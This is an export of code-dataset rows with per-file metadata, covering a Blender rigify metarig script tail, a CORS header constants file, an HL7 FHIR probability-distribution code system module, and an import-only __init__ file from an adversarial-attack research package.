pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.L.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.T.R.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
bpy.ops.object.mode_set(mode='EDIT')
for bone in arm.edit_bones:
bone.select = False
bone.select_head = False
bone.select_tail = False
for b in bones:
bone = arm.edit_bones[bones[b]]
bone.select = True
bone.select_head = True
bone.select_tail = True
arm.edit_bones.active = bone
arm.layers = [(x in [0, 3, 4, 5, 7, 10, 13, 16, 19]) for x in range(32)]
# Allow running this generated metarig script directly (e.g. from Blender's
# text editor): build the rig on the currently active object.
if __name__ == "__main__":
    create(bpy.context.active_object)
| 53.398203
| 274
| 0.661395
| 25,457
| 172,316
| 4.379228
| 0.021605
| 0.677419
| 0.893149
| 1.027072
| 0.975252
| 0.948413
| 0.944296
| 0.934384
| 0.92684
| 0.912775
| 0
| 0.062728
| 0.182171
| 172,316
| 3,227
| 275
| 53.398203
| 0.728345
| 0.000226
| 0
| 0.582503
| 1
| 0
| 0.058917
| 0.00195
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000311
| false
| 0.014944
| 0.000623
| 0
| 0.000934
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
beed8e925b74a2a0437df05a80b706640216d067
| 830
|
py
|
Python
|
constants.py
|
omidmogharian/aserver
|
88dc96e2c5ddfda180d7215733e0120279273280
|
[
"MIT"
] | null | null | null |
constants.py
|
omidmogharian/aserver
|
88dc96e2c5ddfda180d7215733e0120279273280
|
[
"MIT"
] | null | null | null |
constants.py
|
omidmogharian/aserver
|
88dc96e2c5ddfda180d7215733e0120279273280
|
[
"MIT"
] | null | null | null |
# CORS response headers.
#
# ``Access-Control-Allow-Headers`` is a comma-separated list; browsers ignore
# whitespace around entries. The original code spelled the same list twice
# with inconsistent spacing ('accessToken,origin,' vs 'accessToken, origin,');
# it is now defined once in canonical ", "-separated form.
_ALLOWED_REQUEST_HEADERS = (
    'access_token, accessToken, origin, x-csrftoken, content-type, accept'
)

# Default CORS headers for ordinary API responses (GET/POST/OPTIONS).
Basic_HEADER = {'Access-Control-Allow-Origin': '*',
                'Access-Control-Allow-Methods': 'POST, GET, OPTIONS',
                'Access-Control-Allow-Headers': _ALLOWED_REQUEST_HEADERS,
                # Cache the preflight response for 20 days (seconds).
                'Access-Control-Max-Age': '1728000'}

# CORS headers for the file-upload endpoint, which accepts POST only.
FILE_UPLOAD_HEADER = {'Access-Control-Allow-Origin': '*',
                      'Access-Control-Allow-Methods': 'POST',
                      'Access-Control-Allow-Headers': _ALLOWED_REQUEST_HEADERS,
                      # Cache the preflight response for 20 days (seconds).
                      'Access-Control-Max-Age': '1728000'}
| 43.684211
| 69
| 0.433735
| 61
| 830
| 5.819672
| 0.377049
| 0.292958
| 0.304225
| 0.135211
| 0.929577
| 0.929577
| 0.929577
| 0.929577
| 0.929577
| 0.929577
| 0
| 0.029915
| 0.436145
| 830
| 18
| 70
| 46.111111
| 0.728632
| 0
| 0
| 0.117647
| 0
| 0
| 0.461446
| 0.253012
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
835d0cafdadecdf6cd2d88be712d837d53cc5e7f
| 8,604
|
py
|
Python
|
oops_fhir/r4/code_system/v3_probability_distribution_type.py
|
Mikuana/oops_fhir
|
77963315d123756b7d21ae881f433778096a1d25
|
[
"MIT"
] | null | null | null |
oops_fhir/r4/code_system/v3_probability_distribution_type.py
|
Mikuana/oops_fhir
|
77963315d123756b7d21ae881f433778096a1d25
|
[
"MIT"
] | null | null | null |
oops_fhir/r4/code_system/v3_probability_distribution_type.py
|
Mikuana/oops_fhir
|
77963315d123756b7d21ae881f433778096a1d25
|
[
"MIT"
] | null | null | null |
from pathlib import Path

from fhir.resources.codesystem import CodeSystem

from oops_fhir.utils import CodeSystemConcept

__all__ = ["v3ProbabilityDistributionType"]

# The FHIR CodeSystem definition ships as a JSON document alongside this
# module (same file stem, ".json" suffix); parse it once at import time.
_resource = CodeSystem.parse_file(Path(__file__).with_suffix(".json"))
class v3ProbabilityDistributionType:
    """
    v3 Code System ProbabilityDistributionType

     **** MISSING DEFINITIONS ****

    Status: active - Version: 2018-08-12

    Copyright None

    http://terminology.hl7.org/CodeSystem/v3-ProbabilityDistributionType
    """

    # Each class attribute below is one concept of the code system. The bare
    # string literal that follows each attribute repeats the concept's display
    # name and definition so IDEs surface it as documentation (generated-code
    # convention of oops_fhir; these literals are intentionally not comments).

    b = CodeSystemConcept(
        {
            "code": "B",
            "definition": "The beta-distribution is used for data that is bounded on both sides and may or may not be skewed (e.g., occurs when probabilities are estimated.) Two parameters a and b are available to adjust the curve. The mean m and variance s2 relate as follows: m = a/ (a + b) and s2 = ab/((a + b)2 (a + b + 1)).",
            "display": "beta",
        }
    )
    """
    beta

    The beta-distribution is used for data that is bounded on both sides and may or may not be skewed (e.g., occurs when probabilities are estimated.) Two parameters a and b are available to adjust the curve. The mean m and variance s2 relate as follows: m = a/ (a + b) and s2 = ab/((a + b)2 (a + b + 1)).
    """

    e = CodeSystemConcept(
        {
            "code": "E",
            "definition": "Used for data that describes extinction. The exponential distribution is a special form of g-distribution where a = 1, hence, the relationship to mean m and variance s2 are m = b and s2 = b2.",
            "display": "exponential",
        }
    )
    """
    exponential

    Used for data that describes extinction. The exponential distribution is a special form of g-distribution where a = 1, hence, the relationship to mean m and variance s2 are m = b and s2 = b2.
    """

    f = CodeSystemConcept(
        {
            "code": "F",
            "definition": "Used to describe the quotient of two c2 random variables. The F-distribution has two parameters n1 and n2, which are the numbers of degrees of freedom of the numerator and denominator variable respectively. The relationship to mean m and variance s2 are: m = n2 / (n2 - 2) and s2 = (2 n2 (n2 + n1 - 2)) / (n1 (n2 - 2)2 (n2 - 4)).",
            "display": "F",
        }
    )
    """
    F

    Used to describe the quotient of two c2 random variables. The F-distribution has two parameters n1 and n2, which are the numbers of degrees of freedom of the numerator and denominator variable respectively. The relationship to mean m and variance s2 are: m = n2 / (n2 - 2) and s2 = (2 n2 (n2 + n1 - 2)) / (n1 (n2 - 2)2 (n2 - 4)).
    """

    g = CodeSystemConcept(
        {
            "code": "G",
            "definition": "The gamma-distribution used for data that is skewed and bounded to the right, i.e. where the maximum of the distribution curve is located near the origin. The g-distribution has a two parameters a and b. The relationship to mean m and variance s2 is m = a b and s2 = a b2.",
            "display": "(gamma)",
        }
    )
    """
    (gamma)

    The gamma-distribution used for data that is skewed and bounded to the right, i.e. where the maximum of the distribution curve is located near the origin. The g-distribution has a two parameters a and b. The relationship to mean m and variance s2 is m = a b and s2 = a b2.
    """

    ln = CodeSystemConcept(
        {
            "code": "LN",
            "definition": "The logarithmic normal distribution is used to transform skewed random variable X into a normally distributed random variable U = log X. The log-normal distribution can be specified with the properties mean m and standard deviation s. Note however that mean m and standard deviation s are the parameters of the raw value distribution, not the transformed parameters of the lognormal distribution that are conventionally referred to by the same letters. Those log-normal parameters mlog and slog relate to the mean m and standard deviation s of the data value through slog2 = log (s2/m2 + 1) and mlog = log m - slog2/2.",
            "display": "log-normal",
        }
    )
    """
    log-normal

    The logarithmic normal distribution is used to transform skewed random variable X into a normally distributed random variable U = log X. The log-normal distribution can be specified with the properties mean m and standard deviation s. Note however that mean m and standard deviation s are the parameters of the raw value distribution, not the transformed parameters of the lognormal distribution that are conventionally referred to by the same letters. Those log-normal parameters mlog and slog relate to the mean m and standard deviation s of the data value through slog2 = log (s2/m2 + 1) and mlog = log m - slog2/2.
    """

    n = CodeSystemConcept(
        {
            "code": "N",
            "definition": 'This is the well-known bell-shaped normal distribution. Because of the central limit theorem, the normal distribution is the distribution of choice for an unbounded random variable that is an outcome of a combination of many stochastic processes. Even for values bounded on a single side (i.e. greater than 0) the normal distribution may be accurate enough if the mean is "far away" from the bound of the scale measured in terms of standard deviations.',
            "display": "normal (Gaussian)",
        }
    )
    """
    normal (Gaussian)

    This is the well-known bell-shaped normal distribution. Because of the central limit theorem, the normal distribution is the distribution of choice for an unbounded random variable that is an outcome of a combination of many stochastic processes. Even for values bounded on a single side (i.e. greater than 0) the normal distribution may be accurate enough if the mean is "far away" from the bound of the scale measured in terms of standard deviations.
    """

    t = CodeSystemConcept(
        {
            "code": "T",
            "definition": "Used to describe the quotient of a normal random variable and the square root of a c2 random variable. The t-distribution has one parameter n, the number of degrees of freedom. The relationship to mean m and variance s2 are: m = 0 and s2 = n / (n - 2)",
            "display": "T",
        }
    )
    """
    T

    Used to describe the quotient of a normal random variable and the square root of a c2 random variable. The t-distribution has one parameter n, the number of degrees of freedom. The relationship to mean m and variance s2 are: m = 0 and s2 = n / (n - 2)
    """

    u = CodeSystemConcept(
        {
            "code": "U",
            "definition": "The uniform distribution assigns a constant probability over the entire interval of possible outcomes, while all outcomes outside this interval are assumed to have zero probability. The width of this interval is 2s sqrt(3). Thus, the uniform distribution assigns the probability densities f(x) = sqrt(2 s sqrt(3)) to values m - s sqrt(3) >= x <= m + s sqrt(3) and f(x) = 0 otherwise.",
            "display": "uniform",
        }
    )
    """
    uniform

    The uniform distribution assigns a constant probability over the entire interval of possible outcomes, while all outcomes outside this interval are assumed to have zero probability. The width of this interval is 2s sqrt(3). Thus, the uniform distribution assigns the probability densities f(x) = sqrt(2 s sqrt(3)) to values m - s sqrt(3) >= x <= m + s sqrt(3) and f(x) = 0 otherwise.
    """

    x2 = CodeSystemConcept(
        {
            "code": "X2",
            "definition": "Used to describe the sum of squares of random variables which occurs when a variance is estimated (rather than presumed) from the sample. The only parameter of the c2-distribution is n, so called the number of degrees of freedom (which is the number of independent parts in the sum). The c2-distribution is a special type of g-distribution with parameter a = n /2 and b = 2. Hence, m = n and s2 = 2 n.",
            "display": "chi square",
        }
    )
    """
    chi square

    Used to describe the sum of squares of random variables which occurs when a variance is estimated (rather than presumed) from the sample. The only parameter of the c2-distribution is n, so called the number of degrees of freedom (which is the number of independent parts in the sum). The c2-distribution is a special type of g-distribution with parameter a = n /2 and b = 2. Hence, m = n and s2 = 2 n.
    """

    class Meta:
        # oops_fhir convention: expose the parsed CodeSystem resource that
        # these concept attributes were generated from.
        resource = _resource
| 59.337931
| 649
| 0.677359
| 1,286
| 8,604
| 4.521773
| 0.177294
| 0.013758
| 0.022012
| 0.027515
| 0.852623
| 0.850903
| 0.850903
| 0.847463
| 0.847463
| 0.847463
| 0
| 0.019353
| 0.249303
| 8,604
| 144
| 650
| 59.75
| 0.880941
| 0.022896
| 0
| 0
| 0
| 0.126761
| 0.720041
| 0.00593
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.042254
| 0
| 0.197183
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
835dc089927fa81f4bc85ce7b3430f8fd20dba49
| 225
|
py
|
Python
|
policy_driven_attack/policy/mnist/__init__.py
|
machanic/TangentAttack
|
17c1a8e93f9bbd03e209e8650631af744a0ff6b8
|
[
"Apache-2.0"
] | 4
|
2021-11-12T04:06:32.000Z
|
2022-01-27T09:01:41.000Z
|
policy_driven_attack/policy/mnist/__init__.py
|
machanic/TangentAttack
|
17c1a8e93f9bbd03e209e8650631af744a0ff6b8
|
[
"Apache-2.0"
] | 1
|
2022-02-22T14:00:59.000Z
|
2022-02-25T08:57:29.000Z
|
policy_driven_attack/policy/mnist/__init__.py
|
machanic/TangentAttack
|
17c1a8e93f9bbd03e209e8650631af744a0ff6b8
|
[
"Apache-2.0"
] | null | null | null |
# Package re-export hub: flatten the MNIST policy-network submodules so their
# public names can be imported directly from ``policy_driven_attack.policy.mnist``.
# (Star imports are intentional here — this is an ``__init__``-style aggregator.)
from policy_driven_attack.policy.mnist.empty import *
from policy_driven_attack.policy.mnist.unet import *
from policy_driven_attack.policy.mnist.carlinet_inv import *
from policy_driven_attack.policy.mnist.vgg_inv import *
| 37.5
| 60
| 0.853333
| 34
| 225
| 5.352941
| 0.323529
| 0.21978
| 0.351648
| 0.483516
| 0.824176
| 0.824176
| 0.642857
| 0
| 0
| 0
| 0
| 0
| 0.075556
| 225
| 5
| 61
| 45
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.